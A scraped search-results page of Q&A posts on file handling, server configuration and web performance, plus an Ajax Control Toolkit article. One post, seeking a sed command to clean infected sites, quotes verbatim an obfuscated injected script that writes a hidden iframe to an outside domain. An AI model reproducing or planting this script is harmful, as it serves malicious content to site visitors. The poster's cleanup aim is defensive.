Search Results

Search found 56854 results on 2275 pages for 'temporary internet files'.

Page 407/2275 | < Previous Page | 403 404 405 406 407 408 409 410 411 412 413 414  | Next Page >

  • Outlook + Exchange 2007: is it possible to get rid of local OST files?

    - by kdl
    I am looking for a solution that would let me use the convenience of Outlook as a mail client app while at the same time having no PST or OST files on the local computer. Even in non-cached mode, Outlook creates an OST file into which it downloads everything from the Exchange server. OWA does not create any local files (except cookies, I believe) but lacks some of the nice features Outlook has. Would it be feasible to place OST files on a network share? Maybe a solution exists for some other client+server pair?

    Read the article

  • Multiple .bkf files created in Backup Exec 12.5 or 2010 related to heavy I/O?

    - by syuusuke
    Hey everyone, I was wondering if anyone who has used Backup Exec 12.5 or 2010 has ever experienced multiple .bkf files created for a single job. To describe what I mean by multiple files: the .bkf files are being created with random file sizes under 2 GB, even though I've assigned the setting to chop the file after it reaches 10 GB. Some jobs will create 20 .bkf files in one job, with file chunks ranging from 50 MB to 800 MB in size. Is this a sign of heavy I/O issues? Bandwidth limitations? I'm not sure; I'm here to seek some advice and suggestions. I've set up another backup server with the same exact settings, and it seems to create a new .bkf file only when the 10 GB limit has been reached. Although I am backing up different machines, I know my settings are an exact match to the problematic server's - or at least I think that's where the problem is.

    Read the article

  • Have the Start menu index applications in places other than Program Files?

    - by user74757
    I love the ability to type any phrase into the Start menu and have Windows 7 bring up relevant executables under Program Files. However, I have a separate folder of my own where I store several portable applications - usually small apps that run straight out of an unzipped folder with few dependencies. I have all of these under a specific hard-coded location - "PortableApps" - but I would really like to tell the Start menu to search this folder as well as Program Files for executables when searching. The search is often clogged because the executables I'm looking for are classified under "Documents" in the search results and buried in other unrelated files. Is there a way I can achieve this in Windows 7? Thanks for any suggestions - Chase

    Read the article

  • Options to efficiently synchronize 1 million files with remote servers?

    - by Zilvinas
    At a company I work for we have such a thing called "playlists", which are small files of ~100-300 bytes each. There are about a million of them, and about 100,000 of them get changed every hour. These playlists need to be uploaded to 10 other remote servers on different continents every hour, and it needs to happen quickly, ideally in under 2 minutes. It's very important that files that are deleted on the master are also deleted on all the replicas. We currently use Linux for our infrastructure. I was thinking about trying rsync with the -W option to copy whole files without comparing contents. I haven't tried it yet, but maybe people who have more experience with rsync could tell me if it's a viable option? What other options are worth considering?
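    For reference, a minimal sketch of the invocation being considered (paths and host are hypothetical; -W skips the delta algorithm and --delete propagates removals to the replica):

        rsync -aW --delete /srv/playlists/ sync@replica1:/srv/playlists/

    Whether this finishes in under 2 minutes for ~1M files depends mostly on directory-scan time rather than transfer size, so it is worth benchmarking before committing to it.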

    Read the article

  • What are 'damaged files' on external hard drive (HFS format for OS X)?

    - by dtlussier
    I have an external HD formatted to default HFS (Mac OS Extended, Journaled), and every once in a while I get a folder called DamagedFiles in the root of the volume. The folder contains a collection of links to files on the drive. In general the files seem fine; I am, for example, able to open the images or text files without a problem. Is this serious? What can I do to fix this problem? Any advice would be great, as I couldn't find anything on here or via Google that addressed this problem in particular. Many thanks.

    Read the article

  • IIS7 is gzipping files but not serving the gzipped version

    - by ptrin
    By following a number of helpful blog posts I have configured IIS to gzip my static files. I have even enabled Failed Request Tracing and filtered to the 200 status code, and I can see the successful compression events taking place as well as the finished headers, which look like this: Headers="Content-Type: text/css Content-Encoding: gzip Last-Modified: Mon, 04 Oct 2010 17:35:08 GMT Accept-Ranges: bytes ETag: "02ef37cea63cb1:0" Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET " However, when I test in Fiddler and Firefox, the Content-Encoding header is missing and the file is not gzipped. This is a similar issue to this question, which was never resolved. IIS is generating the gzipped files, which I can see in C:\inetpub\temp\IIS Temporary Compressed Files. Does anyone know how I can troubleshoot this?
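    One hedged avenue to check, given that compression itself succeeds: IIS 7.x only serves compressed responses for "frequently hit" content, and by default it skips compression for proxied requests (Fiddler acts as a proxy). Both settings are real attributes that live in applicationHost.config; the values below are illustrative, not a confirmed fix:

        <system.webServer>
          <!-- Compress on the first hit instead of requiring 2 hits per 10s -->
          <serverRuntime frequentHitThreshold="1" frequentHitTimePeriod="00:00:10" />
          <!-- Do not suppress compression for HTTP/1.0 or proxied requests -->
          <httpCompression noCompressionForHttp10="false" noCompressionForProxies="false" />
        </system.webServer>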

    Read the article

  • How does Storage Spaces decide where to put my files?

    - by George Duckett
    With Windows 8 Storage Spaces, you can lump many hard disks of varying types, speeds and sizes together to use as a single storage space / logical drive. How does Windows decide what to place where? For example, will it move files around depending on frequency of access? Maybe splitting files that are frequently accessed together across hard disks, etc.? What does it optimize for: speed, reliability, etc.? If the above is asking too much, can I easily see where the files are physically (on which physical disk)?

    Read the article

  • How can I remove malware code in multiple files with sed?

    - by user47556
    I have this malware code in so many .html and .php files on the server. I need to remove it using a sed -i expression that will:
    - search all files under the directory /home/
    - find the infected files
    - remove the code by replacing it with whitespace

    var usikwseoomg = 'PaBUTyjaZYg3cPaBUTyjaZYg69PaBUTyjaZYg66';var nimbchnzujc = 'PaBUTyjaZYg72';var szwtgmqzekr = 'PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg20PaBUTyjaZYg6ePaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22';var yvofadunjkv = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76';var ylydzxyjaci = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22';var xwojmnoxfbs = 'PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg72PaBUTyjaZYg63PaBUTyjaZYg3dPaBUTyjaZYg22';var mgsybgilcfx = 'PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg74PaBUTyjaZYg70PaBUTyjaZYg3aPaBUTyjaZYg2fPaBUTyjaZYg2f';var nixyhgyjouf = 'koska.sytes.net/phl/logs/index.php';var nesrtqwuirb = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg6dPaBUTyjaZYg61PaBUTyjaZYg72PaBUTyjaZYg67PaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg6dPaBUTyjaZYg61PaBUTyjaZYg72PaBUTyjaZYg67PaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg74PaBUTyjaZYg69PaBUTyjaZYg74PaBUTyjaZYg6cPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22';var rqchyojemkn = 'PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76';var niupgeebkhf = 'PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg63PaBUTyjaZYg72PaBUTyjaZYg6fPaBUTyjaZYg6cPaBUTyjaZYg6cPaBUTyjaZYg69PaBUTyjaZYg6ePaBUTyjaZYg67PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg6ePaBUTyjaZYg6fPaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg62PaBUTyjaZYg6fPaBUTyjaZYg72PaBUTyjaZYg64PaBUTyjaZYg65PaBUTyjaZYg72PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg66PaBUTyjaZYg72PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg62PaBUTyjaZYg6fPaBUTyjaZYg72PaBUTyjaZYg64PaBUTyjaZYg65PaBUTyjaZYg72PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22PaBUTyjaZYg3e';var yyzsvtbnudd = 'PaBUTyjaZYg3cPaBUTyjaZYg2fPaBUTyjaZYg69PaBUTyjaZYg66';var tlclvgxfthn = 'PaBUTyjaZYg72PaBUTyjaZYg61';var zxttbudjafh = 'PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3e';var yydszqnduko = new Array();yydszqnduko[0]=new Array(usikwseoomg+nimbchnzujc+szwtgmqzekr+yvofadunjkv+ylydzxyjaci+xwojmnoxfbs+mgsybgilcfx+nixyhgyjouf+nesrtqwuirb+rqchyojemkn+niupgeebkhf+yyzsvtbnudd+tlclvgxfthn+zxttbudjafh);document['PaBUTyjaZYgwPaBUTyjaZYgrPaBUTyjaZYgiPaBUTyjaZYgtPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg/g,'')](window['PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg'.replace(/PaBUTyjaZYg/g,'')](yydszqnduko.toString().replace(/PaBUTyjaZYg/g,'%')));
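    A sketch of one way to do it with find, grep, and GNU sed, assuming the payload occupies a single line and using the obfuscation marker as the search key (back up the files first):

        # Find infected .php/.html files under /home/, then delete everything
        # from "var usikwseoomg" through the trailing ")));" on that line.
        find /home/ -type f \( -name '*.php' -o -name '*.html' \) \
          -exec grep -l 'PaBUTyjaZYg' {} + \
          | xargs -r -d '\n' sed -i 's|var usikwseoomg.*)));||'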

    Read the article

  • How can I get command prompt to merge my files in name order?

    - by Anastasia
    I'm using the copy command in command prompt to merge all the files in a directory, for a number of directories. The problem is, I need to edit the first file in each directory before I merge. This means that when I put in the command "copy /b *.mp3 name.mp3", the joined file has part 2 at the start and part 1 at the end, presumably because part 1 was created last. Is there a way of using the copy command so that the files merge in name order? Each folder has a different number of parts, anywhere from 2 to 1000, so I don't want to list each file with a "+" in between. Ideally, I'd like to find something to insert into the copy command I'm already using. Otherwise, is there a way of rearranging the files in a folder so that if you enter "DIR", part 1 shows up first even if it was edited last? I'm using Windows 7, by the way.
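    One possible approach (a sketch; file names hypothetical): let dir /b /on produce the name-sorted list and append each part to an output file kept outside the *.mp3 wildcard, relying on copy /b with no destination appending to the first file named:

        @echo off
        rem In a .bat file use %%F; at the interactive prompt use %F instead.
        type nul > "%TEMP%\joined.mp3"
        for /f "delims=" %%F in ('dir /b /on *.mp3') do copy /b "%TEMP%\joined.mp3"+"%%F" >nul
        move /y "%TEMP%\joined.mp3" joined.mp3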

    Read the article

  • How to batch rename files based on file header/metadata in Windows?

    - by Infraded
    I have a directory full of randomly named files of different types, all with no file extensions. Most are images, with some videos and some plaintext. I've used one of the Windows versions of file to confirm the files can all be identified by their headers/metadata, but would like to automate the naming as there are roughly 2400 files. I don't care so much about the filename as just having the appropriate extension for its type. Is anyone aware of a program or script that can do this?
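    A hedged sketch of the scripted route (the signature table is illustrative and far from exhaustive; the directory path is hypothetical):

        # Rename extensionless files based on well-known magic numbers.
        import os

        SIGNATURES = [
            (b"\xff\xd8\xff", ".jpg"),
            (b"\x89PNG\r\n\x1a\n", ".png"),
            (b"GIF87a", ".gif"),
            (b"GIF89a", ".gif"),
            (b"PK\x03\x04", ".zip"),
        ]

        def guess_ext(path):
            with open(path, "rb") as f:
                head = f.read(16)
            for magic, ext in SIGNATURES:
                if head.startswith(magic):
                    return ext
            return ".txt"  # fall back to plaintext for unknown headers

        folder = r"C:\unsorted"  # hypothetical
        for name in os.listdir(folder):
            full = os.path.join(folder, name)
            if os.path.isfile(full) and "." not in name:
                os.rename(full, full + guess_ext(full))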

    Read the article

  • How does the internet protocol handle network card numbers?

    - by Giorgio
    I know that data packets sent over the internet carry the source and destination IP address, so that the protocol can route the data to the correct destination and keep track of the source address of the packet. But what about the network card address? As far as I know, each network card has a unique identification number. Is this also transmitted with a TCP/IP packet? And when a packet is received at its destination, how is the IP address mapped to a network card number? In other words: on the sender side, does the sender store its network card number in the IP packets that it sends? On the receiver side, which component maps the IP address to the receiver's network card number when a packet is received? E.g., in a home network, does the modem/router map the destination IP address of an incoming packet to a network card number and deliver the packet directly to that network card? A link to documentation on these topics would be of great help.

    Read the article

  • Windows 7: search for files with special characters in the name

    - by Luke
    I have a rather large source code repository on my machine; it is not indexed by Windows Search. I am trying to find some oddly-named generated files of the form .#name.extension.version where name and extension are normal names and extensions and version is a numeric value (e.g. something like 1.186). On Windows XP I could find these files by searching for .#*; on Windows 7 that just returns every single file and directory. So my question is this: is it possible to find files named like that using the built-in Windows 7 search functionality? I did find this question which is very similar, but the answer doesn't work for me; it seems like any special character I put in the query is either ignored or treated as a wildcard, and as a result it matches every single file and directory. Is there perhaps some registry value I can set to make the search-by-filename feature work with special characters?

    Read the article

  • How do I split a large MySql backup file into multiple files?

    - by Brian T Hannan
    I have a 250 MB backup SQL file, but the limit on the new hosting is only 100 MB ... Is there a program that lets you split an SQL file into multiple SQL files? It seems like people are answering the wrong question ... so I will clarify more: I ONLY have the 250 MB file, and on the new hosting I only have access via phpMyAdmin, which currently has no data in the database. I need to take the 250 MB file and upload it to the new host, but there is a 100 MB SQL backup file upload size limit. I simply need to take one file that is too large and split it out into multiple files, each containing only full, valid SQL statements (no statement can be split between two files).
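    For what it's worth, a sketch of the splitting logic (file names hypothetical; the heuristic is that a chunk may end only after a line that closes a statement with ';', which holds for typical mysqldump output):

        # Split backup.sql into chunks that stay under the upload cap,
        # cutting only after a statement-terminating line.
        LIMIT = 95 * 1024 * 1024  # stay safely under 100 MB

        part, size = 1, 0
        out = open("backup.part%03d.sql" % part, "wb")
        with open("backup.sql", "rb") as dump:
            for line in dump:
                out.write(line)
                size += len(line)
                if size >= LIMIT and line.rstrip().endswith(b";"):
                    out.close()
                    part, size = part + 1, 0
                    out = open("backup.part%03d.sql" % part, "wb")
        out.close()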

    Read the article

  • How can I rename files and subdirectories in a copied directory based on changes in the original?

    - by GaryF
    I have a directory structure with many hundreds of files and folders underneath it for organising files (in this case photos). I create backups of that directory structure by rsyncing it periodically to identical copies on external drives. These drives may be offsite some of the time. I want to restructure and rename the files and directories in the original and then, later, when I have an external drive onsite, be able to run some tool that will cause these structural and naming changes to happen on the backup. If I just use rsync, it'll have to recopy much of the data to the backup drive, which I'd rather avoid due to the sizes involved. How can I get the changes I make to the original directory into the backups, as they become available, without having to recopy/rsync the data?

    Read the article

  • Configuring two subnets with two NICs: access from a NAS to the internet

    - by archipestre
    I am having trouble configuring my NAS. I have a DSL router with WiFi (192.168.1.1) in my flatmate's room. In my room I have a server with two NICs:
    1) wlan0 (192.168.1.2), which connects to the DSL router via wireless
    2) em1 (192.168.0.1), which connects to the NAS (192.168.0.20) with a crossover cable
    I have Fedora 17 and I have enabled packet forwarding. My IP configuration is as follows:
    wlan0: inet 192.168.1.2 netmask 255.255.255.0 broadcast 192.168.1.255
    em1: inet 192.168.0.1 netmask 255.255.255.0 broadcast 192.168.0.255
    My routing table looks like:
    Destination Gateway Genmask Flags Metric Ref Use Iface
    0.0.0.0 192.168.1.1 0.0.0.0 UG 0 0 0 wlan0
    192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 em1
    192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 wlan0
    I have enabled a static route on the DSL router:
    Status Network Destination Subnet Mask Interface Gateway
    Active 192.168.0.0 255.255.255.0 LAN 192.168.1.2
    From my server I can ping the DSL router and the NAS. From the NAS I can ping both NICs of the server. However, the NAS is unable to ping the DSL router or any address on the internet. Any idea what is wrong? Thank you in advance.
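    One hedged guess, given that forwarding is on and the static route exists: if the router still drops or misroutes replies for 192.168.0.0/24 (common when such routes only apply to LAN-originated traffic), masquerading the NAS subnet behind the server's wireless interface sidesteps the problem. It is also worth confirming the NAS's default gateway is 192.168.0.1.

        # On the Fedora server (a sketch, not a confirmed fix)
        iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -o wlan0 -j MASQUERADE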

    Read the article

  • Print over the internet from a remote Linux session to printers shared locally (on a Windows 7 machine)?

    - by obeliksz
    I'm trying to use a Linux virtual machine as a file server for Windows clients. I have successfully implemented remote file sharing (Samba + SSH), with which I am able to print locally using a little program I made for this purpose (JetForms style)... but I would like to hear about a somewhat more direct approach. How can I attach the printers to the server, so that I can, for example, open a file in the remote session and see my local printers (on the machine from which I have established the remote session) in the print dialog box? I guess there should be some kind of PuTTY tunneling, but I don't know how. I have a Windows 7 machine locally; there is a CentOS 6 VM over the internet. It has SSH, CUPS, and Samba. I have found a question which asks the opposite: there is a Windows-based server to connect to from Linux, but that Windows machine has a domain; mine is just a simple Windows workstation that is behind NAT and has a dynamic IP. That question is: Print from Linux to Windows networked printer.
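    A sketch of the tunneling idea (printer IP and names are hypothetical; port 9100 assumes a raw/JetDirect-capable printer): run a reverse tunnel from the Windows 7 machine, then point a CUPS queue on the server at the forwarded port.

        rem On the Windows 7 machine: expose the local printer on the server
        plink -N -R 9100:192.168.1.50:9100 user@centos-server

        # On the CentOS server: a queue that prints back through the tunnel
        lpadmin -p localprinter -E -v socket://localhost:9100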

    Read the article

  • How to know which app each ".automaticDestinations-ms" file relates to?

    - by Timotei Dolean
    Does anyone know (nobody on the Microsoft forums answered me) how I can find which app owns which automaticDestinations-ms file in %AppData%\Microsoft\Windows\Recent\AutomaticDestinations? That's the folder where Windows 7 stores its jump lists, and I want to know how to find, automatically/programmatically, the relation between each file and an application. Even manually I didn't find any pattern, short of looking at the file extensions inside each file; but some programs open files with the same extension (like images), so that method does not work for all programs. Do you have any other idea? Maybe knowing the format of those files? Thanks.

    Read the article

  • Two-way sync of a folder on a PC to a USB thumb drive over the internet

    - by Tim Santeford
    Before flagging as duplicate, please note that other similar posts do not have the same criteria below. Thanks. I'm looking for an app that will let me automatically sync a USB drive with a folder on my home system over the internet. I would like to roam from computer to computer and run this syncing app from the USB drive. I'm looking for the same functionality as Dropbox, but without the 2 GB restriction and without the need to fully install:
    - Two-way sync between a USB drive and a PC over the net
    - Utilizes the full size of the USB drive, not limited by an online storage size (I don't need online backup or versioning)
    - Allows the removal of the USB drive; plugging it into another computer will resume its sync
    - While the drive is connected, the app should run silently, keeping changed files in sync (I don't want to run a manual process other than simply starting the app)
    - Must be able to run as a portable app from the USB drive, but can fully install on the home PC
    - Windows 7 support is preferable
    Please let me know if such an awesome app exists. TIA!

    Read the article

  • Can I move files from a laptop hard drive with a corrupt sector to a USB hard drive?

    - by Corey
    I have a hard drive that is on its way out and won't boot to Windows 7. The Windows partition takes up the whole disk. I thought I would try to recover some recent files that hadn't been backed up. Assuming the files are recoverable, how can I explore the drive that has the corrupt sector and transfer files to a USB hard drive? If it helps, the laptop is able to see the USB drive when choosing a boot order. Some searching led me to WinPE 3.0, part of the Windows Automated Installation Kit. Is that a method?

    Read the article

  • April 2013 Release of the Ajax Control Toolkit

    - by Stephen.Walther
    I’m excited to announce the April 2013 release of the Ajax Control Toolkit. For this release, we focused on improving two controls: the AjaxFileUpload and the MaskedEdit controls. You can download the latest release from CodePlex at http://AjaxControlToolkit.CodePlex.com or, better yet, you can execute the following NuGet command within Visual Studio 2010/2012: There are three builds of the Ajax Control Toolkit: .NET 3.5, .NET 4.0, and .NET 4.5. A Better AjaxFileUpload Control We completely rewrote the AjaxFileUpload control for this release. We had two primary goals. First, we wanted to support uploading really large files. In particular, we wanted to support uploading multi-gigabyte files such as video files or application files. Second, we wanted to support showing upload progress on as many browsers as possible. The previous version of the AjaxFileUpload could show upload progress when used with Google Chrome or Mozilla Firefox but not when used with Apple Safari or Microsoft Internet Explorer. The new version of the AjaxFileUpload control shows upload progress when used with any browser. Using the AjaxFileUpload Control Let me walk-through using the AjaxFileUpload in the most basic scenario. And then, in following sections, I can explain some of its more advanced features. Here’s how you can declare the AjaxFileUpload control in a page: <ajaxToolkit:ToolkitScriptManager runat="server" /> <ajaxToolkit:AjaxFileUpload ID="AjaxFileUpload1" AllowedFileTypes="mp4" OnUploadComplete="AjaxFileUpload1_UploadComplete" runat="server" /> The exact appearance of the AjaxFileUpload control depends on the features that a browser supports. In the case of Google Chrome, which supports drag-and-drop upload, here’s what the AjaxFileUpload looks like: Notice that the page above includes two Ajax Control Toolkit controls: the AjaxFileUpload and the ToolkitScriptManager control. You always need to include the ToolkitScriptManager with any page which uses Ajax Control Toolkit controls. The AjaxFileUpload control declared in the page above includes an event handler for its UploadComplete event. This event handler is declared in the code-behind page like this: protected void AjaxFileUpload1_UploadComplete(object sender, AjaxControlToolkit.AjaxFileUploadEventArgs e) { // Save uploaded file to App_Data folder AjaxFileUpload1.SaveAs(MapPath("~/App_Data/" + e.FileName)); } This method saves the uploaded file to your website’s App_Data folder. I’m assuming that you have an App_Data folder in your project – if you don’t have one then you need to create one or you will get an error. There is one more thing that you must do in order to get the AjaxFileUpload control to work. The AjaxFileUpload control relies on an HTTP Handler named AjaxFileUploadHandler.axd. 
    You need to declare this handler in your application's root web.config file like this:

        <configuration>
          <system.web>
            <compilation debug="true" targetFramework="4.5" />
            <httpRuntime targetFramework="4.5" maxRequestLength="42949672" />
            <httpHandlers>
              <add verb="*" path="AjaxFileUploadHandler.axd"
                type="AjaxControlToolkit.AjaxFileUploadHandler, AjaxControlToolkit"/>
            </httpHandlers>
          </system.web>
          <system.webServer>
            <validation validateIntegratedModeConfiguration="false"/>
            <handlers>
              <add name="AjaxFileUploadHandler" verb="*" path="AjaxFileUploadHandler.axd"
                type="AjaxControlToolkit.AjaxFileUploadHandler, AjaxControlToolkit"/>
            </handlers>
            <security>
              <requestFiltering>
                <requestLimits maxAllowedContentLength="4294967295"/>
              </requestFiltering>
            </security>
          </system.webServer>
        </configuration>

    Notice that the web.config file above also contains configuration settings for maxRequestLength and maxAllowedContentLength. You need to assign large values to these configuration settings - as I did in the web.config file above - in order to accept large file uploads.

    Supporting Chunked File Uploads

    Because one of our primary goals with this release was support for large file uploads, we added support for client-side chunking. When you upload a file using a browser which fully supports the HTML5 File API - such as Google Chrome or Mozilla Firefox - then the file is uploaded in multiple chunks. You can see chunking in action by opening the F12 developer tools in your browser and observing the Network tab (screenshot omitted). Notice that there is a crazy number of distinct post requests made (about 360 distinct requests for a 1 gigabyte file). Each post request looks like this:

        http://localhost:24338/AjaxFileUploadHandler.axd?contextKey={DA8BEDC8-B952-4d5d-8CC2-59FE922E2923}&fileId=B7CCE31C-6AB1-BB28-2940-49E0C9B81C64&fileName=Sita_Sings_the_Blues_480p_2150kbps.mp4&chunked=true&firstChunk=false

    Each request posts another chunk of the file being uploaded. Notice that the request URL includes a chunked=true parameter which indicates that the browser is breaking the file being uploaded into multiple chunks.

    Showing Upload Progress on All Browsers

    The previous version of the AjaxFileUpload control could display upload progress only in the case of browsers which fully support the HTML5 File API. The new version of the AjaxFileUpload control can display upload progress in the case of all browsers. If a browser does not fully support the HTML5 File API then the browser polls the server every few seconds with an Ajax request to determine the percentage of the file that has been uploaded. This technique of displaying progress works with any browser which supports making Ajax requests. There is one catch. Be warned that this new feature only works with the .NET 4.0 and .NET 4.5 versions of the AjaxControlToolkit. To show upload progress, we are taking advantage of the new ASP.NET HttpRequest.GetBufferedInputStream() and HttpRequest.GetBufferlessInputStream() methods, which are not supported by .NET 3.5. For example, here is what the requests in the Network tab look like when you use the AjaxFileUpload with Microsoft Internet Explorer:

        GET /WebForm1.aspx?contextKey={DA8BEDC8-B952-4d5d-8CC2-59FE922E2923}&poll=1&guid=9206FF94-76F9-B197-D1BC-EA9AD282806B HTTP/1.1

    Notice that each request includes a poll=1 parameter. This parameter indicates that this is a polling request to get the size of the file buffered on the server.
Here’s what the response body of a request looks like when about 20% of a file has been uploaded: Buffering to a Temporary File When you upload a file using the AjaxFileUpload control, the file upload is buffered to a temporary file located at Path.GetTempPath(). When you call the SaveAs() method, as we did in the sample page above, the temporary file is copied to a new file and then the temporary file is deleted. If you don’t call the SaveAs() method, then you must ensure that the temporary file gets deleted yourself. For example, if you want to save the file to a database then you will never call the SaveAs() method and you are responsible for deleting the file. The easiest way to delete the temporary file is to call the AjaxFileUploadEventArgs.DeleteTemporaryData() method in the UploadComplete handler: protected void AjaxFileUpload1_UploadComplete(object sender, AjaxControlToolkit.AjaxFileUploadEventArgs e) { // Save uploaded file to a database table e.DeleteTemporaryData(); } You also can call the static AjaxFileUpload.CleanAllTemporaryData() method to delete all temporary data and not only the temporary data related to the current file upload. For example, you might want to call this method on application start to ensure that all temporary data is removed whenever your application restarts. A Better MaskedEdit Extender This release of the Ajax Control Toolkit contains bug fixes for the top-voted issues related to the MaskedEdit control. We closed over 25 MaskedEdit issues. Here is a complete list of the issues addressed with this release: · 17302 MaskedEditExtender MaskType=Date, Mask=99/99/99 Undefined JS Error · 11758 MaskedEdit causes error in JScript when working with 2-digits year · 18810 Maskededitextender/validator Date validation issue · 23236 MaskEditValidator does not work with date input using format dd/mm/yyyy · 23042 Webkit based browsers (Safari, Chrome) and MaskedEditExtender · 26685 MaskedEditExtender@(ClearMaskOnLostFocus=false) adds a zero character when you each focused to target textbox · 16109 MaskedEditExtender: Negative amount, followed by decimal, sets value to positive · 11522 MaskEditExtender of AjaxtoolKit-1.0.10618.0 does not work properly for Hungarian Culture · 25988 MaskedEditExtender – CultureName (HU-hu) > DateSeparator · 23221 MaskedEditExtender date separator problem · 15233 Day and month swap in Dynamic user control · 15492 MaskedEditExtender with ClearMaskOnLostFocus and with MaskedEditValidator with ClientValidationFunction · 9389 MaskedEditValidator – when on no entry · 11392 MaskedEdit Number format messed up · 11819 MaskedEditExtender erases all values beyond first comma separtor · 13423 MaskedEdit(Extender/Validator) combo problem · 16111 MaskedEditValidator cannot validate date with DayMonthYear in UserDateFormat of MaskedEditExtender · 10901 MaskedEdit: The months and date fields swap values when you hit submit if UserDateFormat is set. · 15190 MaskedEditValidator can’t make use of MaskedEditExtender’s UserDateFormat property · 13898 MaskedEdit Extender with custom date type mask gives javascript error · 14692 MaskedEdit error in “yy/MM/dd” format. · 16186 MaskedEditExtender does not handle century properly in a date mask · 26456 MaskedEditBehavior. 
ConvFmtTime : function(input,loadFirst) fails if this._CultureAMPMPlaceholder == “” · 21474 Error on MaskedEditExtender working with number format · 23023 MaskedEditExtender’s ClearMaskOnLostFocus property causes problems for MaskedEditValidator when set to false · 13656 MaskedEditValidator Min/Max Date value issue Conclusion This latest release of the Ajax Control Toolkit required many hours of work by a team of talented developers. I want to thank the members of the Superexpert team for the long hours which they put into this release.

    Read the article

  • Select tool to minimize JavaScript and CSS size

    - by Michael Freidgeim
    There are multiple ways and techniques to combine and minify JS and CSS files. A good number of links can be found in http://stackoverflow.com/questions/882937/asp-net-script-and-css-compression and in http://www.hanselman.com/blog/TheImportanceAndEaseOfMinifyingYourCSSAndJavaScriptAndOptimizingPNGsForYourBlogOrWebsite.aspx
    There are two major approaches: do it during the build, or at run-time. In our application there are multiple user controls, each of them requiring different JS or CSS files, and they are loaded dynamically in different combinations. We decided that loading all JS or CSS files for each page is not a good idea; for each page we need to load a different set of files. Based on this, combining files at the build stage does not look feasible. After reviewing different links, I decided that SquishIt should fit our needs: http://www.codethinked.com/squishit-the-friendly-aspnet-javascript-and-css-squisher
    Different limitations of using SquishIt: We had some browser-specific CSS files that loaded conditionally depending on browser type (i.e. IE versus all other browsers); we had to put them in separate bundles. For resources and AXD files we decided to use the HttpModule and HttpHandler created by Mads Kristensen. To GZIP HTML we are using wwWebUtils.GZipEncodePage() http://www.west-wind.com/weblog/posts/2007/Feb/05/More-on-GZip-compression-with-ASPNET-Content ("Just swap the order of which encoding you apply to start by asking for deflate support and then GZip afterwards.")
    Additional tips about SquishIt: Use a CDN: https://groups.google.com/group/squishit/browse_thread/thread/99f3b61444da9ad1 Support IntelliSense and generate the bundle in code-behind: http://tech.kipusoep.nl/2010/07/23/umbraco-45-visual-studio-2010-dotless-jquery-vsdoc-squishit-masterpages/
    Links about other libraries that were considered: A few links from http://stackoverflow.com/questions/5288656/which-one-has-better-minification-between-squishit-and-combres2
    .NET 4.5 will have out-of-the-box tools for JS/CSS combining: http://weblogs.asp.net/scottgu/archive/2011/11/27/new-bundling-and-minification-support-asp-net-4-5-series.aspx It suggests a default bundle per subfolder, but also seems to support explicitly specified files, similar to SquishIt. http://www.codeproject.com/KB/aspnet/combres2.aspx (its XML config file can specify expiry, etc.) https://github.com/andrewdavey/cassette http://stackoverflow.com/questions/7026029/alternatives-to-cassette
    Dynamically loaded JS files: RequireJS http://requirejs.org/docs/start.html http://www.west-wind.com/weblog/posts/2008/Jul/07/Inclusion-of-JavaScript-Files
    Pack and minimize your JavaScript code size: YUI Compressor (from Yahoo), JSMin (by Douglas Crockford), ShrinkSafe (from the Dojo library), Packer (by Dean Edwards), RadScriptManager & RadStyleSheetManager from Telerik (not free)
